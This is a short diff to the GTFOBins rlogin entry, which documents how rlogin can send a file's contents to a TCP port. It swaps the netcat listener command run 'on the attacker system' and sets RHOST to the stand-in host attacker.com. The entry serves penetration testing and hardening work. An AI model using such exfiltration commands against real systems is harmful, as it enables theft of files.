GTFOBins/GTFOBins.github.io/_gtfobins/rlogin.md

 ---
 functions:
   file-upload:
     - description: Send contents of a file to a TCP port.
-Run `nc -nlvp 12345 > "file_to_save"` on the attacker system to capture the contents.
+Run `nc -l -p 12345 > "file_to_save"` on the attacker system to capture the contents.
       code: |
         RHOST=attacker.com
         RPORT=12345